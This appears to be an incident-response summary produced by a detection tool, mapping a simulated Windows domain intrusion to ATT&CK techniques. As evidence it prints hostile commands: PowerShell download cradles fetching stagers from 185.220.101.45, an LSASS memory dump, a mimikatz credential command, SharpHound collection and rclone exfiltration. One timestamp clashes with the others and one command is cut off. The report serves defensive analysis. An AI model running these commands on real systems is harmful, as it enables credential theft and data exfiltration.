ATTACK PATTERN ANALYSIS — EXECUTIVE SUMMARY
============================================================

Incident Window: 2024-03-15 16:47:45 → 2024-03-15 18:02:44 UTC
Total Indicators: 37

ATTACK PHASES IDENTIFIED:
  • Initial Access (1 indicator)
  • Execution (12 indicators)
  • Persistence (3 indicators)
  • Defense Evasion (1 indicator)
  • Credential Access (4 indicators)
  • Discovery (5 indicators)
  • Lateral Movement (5 indicators)
  • Collection (1 indicator)
  • Exfiltration (3 indicators)
  • Command and Control (2 indicators)

------------------------------------------------------------

[ INITIAL ACCESS ]

  2024-03-15 16:47:45  [HIGH]  T1566.001 — Phishing: Malicious Attachment
  Office application spawned a shell process — macro execution likely.
    → Parent: c:\program files\microsoft office\root\office16\winword.exe
    → Child:  c:\windows\system32\cmd.exe
    → Cmd:    cmd.exe /c powershell.exe -nop -w hidden -encodedcommand base64encoded


[ EXECUTION ]

  2024-03-15 16:47:52  [HIGH]  T1059.001 — PowerShell
  Suspicious PowerShell execution with flags: EncodedCommand, NoProfile, WindowHidden.
    → Cmd: powershell.exe -nop -w hidden -encodedcommand base64encoded

  2024-03-15 16:47:55  [HIGH]  T1059.001 — PowerShell Download Cradle
  PowerShell script block contains download cradle.
    → Block: iex (new-object net.webclient).downloadstring("http://185.220.101.45/stager.ps1")
    → URL: http://185.220.101.45/stager.ps1

  2024-03-15 16:48:02  [HIGH]  T1059.001 — PowerShell Download Cradle
  PowerShell script block contains download cradle.
    → Block: $url="http://185.220.101.45/payload.exe"; $out="$env:temp\svchost32.exe"; (new-object net.webclient).downloadfile($url,$out); start-process $out -argumentlist "-install"
    → URL: http://185.220.101.45/payload.exe

  2024-03-15 16:52:04  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\users\jsmith\appdata\local\temp\pd.exe
    → Cmd:    pd.exe -accepteula -ma lsass.exe c:\users\jsmith\appdata\local\temp\lsass.dmp

  2024-03-15 16:55:00  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\windows\system32\net.exe
    → Cmd:    net.exe group "domain admins" /domain

  2024-03-15 16:55:08  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\windows\system32\net.exe
    → Cmd:    net.exe user /domain

  2024-03-15 16:55:18  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\windows\system32\nltest.exe
    → Cmd:    nltest.exe /domain_trusts /all_trusts

  2024-03-15 16:55:25  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\windows\system32\nltest.exe
    → Cmd:    nltest.exe /dclist:acme.local

  2024-03-15 17:03:05  [HIGH]  T1059.001 — PowerShell Download Cradle
  PowerShell script block contains download cradle.
    → Block: invoke-expression (new-object net.webclient).downloadstring("http://185.220.101.45/sharphound.ps1"); invoke-bloodhound -collectionmethod all
    → URL: http://185.220.101.45/sharphound.ps1

  2024-03-15 17:03:12  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\users\jsmith\appdata\local\temp\sharphound.exe
    → Cmd:    sharphound.exe -c all --domain acme.local --zipfilename bloodhound_acme.zip

  2024-03-15 17:35:18  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\windows\system32\robocopy.exe
    → Cmd:    robocopy.exe \\srv-file01\finance c:\users\jsmith\appdata\local\temp\staging /e /copyall

  2024-03-15 17:41:07  [HIGH]  T1106 — Native API / Malware Process Chain
  Suspicious parent process spawned child.
    → Parent: c:\users\jsmith\appdata\local\temp\svchost32.exe
    → Child:  c:\users\jsmith\appdata\local\temp\rclone.exe
    → Cmd:    rclone.exe copy c:\users\jsmith\appdata\local\temp\staging remote:acme-backup --config c:\users\jsmith\appdata\local\tem


[ PERSISTENCE ]

  2024-03-15 16:48:15  [HIGH]  T1543.003 — New Windows Service
  New service installed: winupdatehelper.
    → Service: winupdatehelper
    → Binary:  c:\users\jsmith\appdata\local\temp\svchost32.exe -service
    → Start:   auto start

  2024-03-15 17:22:05  [HIGH]  T1053.005 — Scheduled Task
  Scheduled task created: \microsoft\windows\updatecheck\winupdatesvc.
    → Task: \microsoft\windows\updatecheck\winupdatesvc
    → Action path hint: suspicious user path

  2024-03-15 17:22:05  [MEDIUM]  T1053.005 — Scheduled Task Registered
  Scheduled task registered: \microsoft\windows\updatecheck\winupdatesvc.
    → Task: \microsoft\windows\updatecheck\winupdatesvc
    → User: acme\jsmith


[ DEFENSE EVASION ]

  2024-03-15 18:02:44  [HIGH]  T1562.001 — AV Warning (Defender)
  Windows Defender generated a warning notification — review threat name.
    → EventID: 1116
    → Host: DESKTOP-W7K2MNX


[ CREDENTIAL ACCESS ]

  2024-03-15 16:52:04  [HIGH]  T1003 — OS Credential Dumping
  Known credential tool executed: Procdump — LSASS dump utility.
    → Process: c:\users\jsmith\appdata\local\temp\pd.exe
    → Cmd: pd.exe -accepteula -ma lsass.exe c:\users\jsmith\appdata\local\temp\lsass.dmp

  2024-03-15 16:52:30  [HIGH]  T1003.001 — LSASS Memory
  Handle requested to LSASS process — memory dump likely.
    → Accessing process: c:\users\jsmith\appdata\local\temp\pd.exe
    → Access mask: 0x1410

  2024-03-15 17:03:05  [HIGH]  T1059.001 — Malicious Script Block
  PowerShell script block contains credential harvesting pattern: invoke-bloodhound.
    → Block: invoke-expression (new-object net.webclient).downloadstring("http://185.220.101.45/sharphound.ps1"); invoke-bloodhound -collectionmethod all

  2024-03-15 17:20:11  [HIGH]  T1059.001 — Malicious Script Block
  PowerShell script block contains credential harvesting pattern: sekurlsa.
    → Block: sekurlsa::logonpasswords


[ DISCOVERY ]

  2024-03-15 16:55:00  [HIGH]  T1069/T1087 — Account/Group Discovery
  Domain group/user enumeration via net.exe
    → Cmd: net.exe group "domain admins" /domain

  2024-03-15 16:55:08  [HIGH]  T1069/T1087 — Account/Group Discovery
  Domain group/user enumeration via net.exe
    → Cmd: net.exe user /domain

  2024-03-15 16:55:18  [HIGH]  T1069/T1087 — Account/Group Discovery
  Domain trust and DC enumeration via nltest.exe
    → Cmd: nltest.exe /domain_trusts /all_trusts

  2024-03-15 16:55:25  [HIGH]  T1069/T1087 — Account/Group Discovery
  Domain trust and DC enumeration via nltest.exe
    → Cmd: nltest.exe /dclist:acme.local

  2024-03-15 17:03:12  [HIGH]  T1087/T1482 — BloodHound AD Collection
  BloodHound/SharpHound executed — full AD object collection for attack path analysis.
    → Cmd: sharphound.exe -c all --domain acme.local --zipfilename bloodhound_acme.zip


[ LATERAL MOVEMENT ]

  2024-03-15 17:15:33  [HIGH]  T1550.002 — Use of Alternate Credentials
  Explicit credential logon to srv-file01 as svc_backup.
    → Target user:   svc_backup
    → Target host:   srv-file01
    → Process used:  c:\windows\system32\mstsc.exe

  2024-03-15 17:16:03  [HIGH]  T1021.001 — Remote Desktop Protocol
  RDP session from 10.10.1.55 as acme\svc_backup.
    → User:    acme\svc_backup
    → Source:  10.10.1.55
    → EventID: 1149

  2024-03-15 17:16:05  [HIGH]  T1021.001 — Remote Desktop Protocol
  RDP session from 10.10.1.55 as acme\svc_backup.
    → User:    acme\svc_backup
    → Source:  10.10.1.55
    → EventID: 21

  2024-03-15 17:16:07  [HIGH]  T1021.001 — Remote Desktop Protocol
  RDP session from 10.10.1.55 as acme\svc_backup.
    → User:    acme\svc_backup
    → Source:  10.10.1.55
    → EventID: 22

  2024-03-15 17:45:00  [MEDIUM]  T1110 — Brute Force / Credential Scanning
  4 logon failures in 9s — possible credential scanning.
    → Target IPs: 10.10.1.20, 10.10.1.21, 10.10.1.22, 10.10.1.23
    → Failure count: 4


[ COLLECTION ]

  2024-03-15 17:35:18  [HIGH]  T1074 — Robocopy used for bulk file staging
  File staging tool robocopy.exe executed.
    → Cmd: robocopy.exe \\srv-file01\finance c:\users\jsmith\appdata\local\temp\staging /e /copyall


[ EXFILTRATION ]

  2024-03-15 16:47:58  [HIGH]  T1048 — Exfiltration Over Alternative Protocol
  60.0 MB sent to 185.220.101.45 via rclone.exe across 15 connections.
    → Destination: 185.220.101.45
    → Total sent:  60.0 MB
    → Connections: 15

  2024-03-15 17:41:07  [HIGH]  T1567 — Rclone cloud exfiltration tool
  Data exfiltration tool detected: rclone.exe.
    → Cmd: rclone.exe copy c:\users\jsmith\appdata\local\temp\staging remote:acme-backup --config c:\users\jsmith\appdata\local\temp\rclone.conf

  2024-03-15 17:41:07  [MEDIUM]  T1567 — Rclone cloud exfiltration tool (Prefetch)
  Exfiltration tool execution evidence in Prefetch: rclone.exe.
    → Path: C:\Users\jsmith\AppData\Local\Temp\rclone.exe
    → Run count: 1


[ COMMAND AND CONTROL ]

  2024-03-15 16:48:30  [HIGH]  T1071 — Application Layer C2 Beaconing
  Regular outbound connections from svchost32.exe to 185.220.101.45:443 suggest C2 beaconing (avg interval: 300s, 8 connections).
    → Process:  C:\Users\jsmith\AppData\Local\Temp\svchost32.exe
    → Dest:     185.220.101.45:443
    → Count:    8 connections

  2024-03-15 17:41:10  [HIGH]  T1071 — Application Layer C2 Beaconing
  Regular outbound connections from rclone.exe to 185.220.101.45:443 suggest C2 beaconing (avg interval: 120s, 6 connections).
    → Process:  C:\Users\jsmith\AppData\Local\Temp\rclone.exe
    → Dest:     185.220.101.45:443
    → Count:    6 connections


------------------------------------------------------------
NOTE: Timestamps are as recorded in source logs (UTC assumed).
Cross-reference all findings against raw artifacts before reporting.